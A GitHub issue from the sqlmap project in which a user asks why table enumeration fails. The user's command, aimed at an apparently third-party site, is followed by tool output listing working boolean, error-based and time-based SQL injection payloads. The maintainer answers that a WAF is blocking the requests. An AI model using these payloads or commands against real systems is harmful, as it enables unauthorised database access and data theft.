search

sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org
Other
31.86k stars 5.66k forks source link

Can't retrieve the table names from db #2631

Closed treusfam closed 7 years ago

treusfam commented 7 years ago

Hi all.. can someone guide me? im getting "[ERROR] unable to retrieve the table names for any database".. im using:

sqlmap -u host.com/new.php?buscar=vln --threads 10 --time-sec 15 --random-agent -D database --tables

i was able to use --dbs and got the correct database.. but i can't get the tables names.

[*] starting at 03:29:07

[03:29:07] [INFO] fetched random HTTP User-Agent header from file '/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X; it-it) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6' [03:29:07] [INFO] resuming back-end DBMS 'mysql' [03:29:07] [INFO] testing connection to the target URL [03:29:11] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS/IDS sqlmap resumed the following injection point(s) from stored session:

Parameter buscar (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: buscar=vln%' AND 2206=2206 AND '%'='

Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)
Payload: f_buscar=eo%' AND UPDATEXML(7518,CONCAT('.','qzzkq',(SELECT (ELT(7518=7518,1))),'qkpqq'),3365) AND '%'='

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: f_buscar=eo%' AND SLEEP(15) AND '%'='

[03:29:11] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.6.31, Apache 2.4.26 back-end DBMS: MySQL >= 5.1 [03:29:11] [INFO] fetching tables for database: 'database' [03:29:12] [WARNING] reflective value(s) found and filtering out [03:29:12] [WARNING] the SQL query provided does not return any output [03:29:12] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex' [03:29:12] [INFO] fetching number of tables for database 'database' [03:29:12] [INFO] retrieved: [03:29:13] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically [03:29:13] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[03:29:22] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[03:29:22] [WARNING] unable to retrieve the number of tables for database 'database' [03:29:22] [ERROR] unable to retrieve the table names for any database do you want to use common table existence check? [y/N/q] No tables found shutting down

I try it with --flush-session just because i read it in other issue from here but has the same result.

stamparm commented 7 years ago

You have a protection there. You should manually assess it. This is not an issue of sqlmap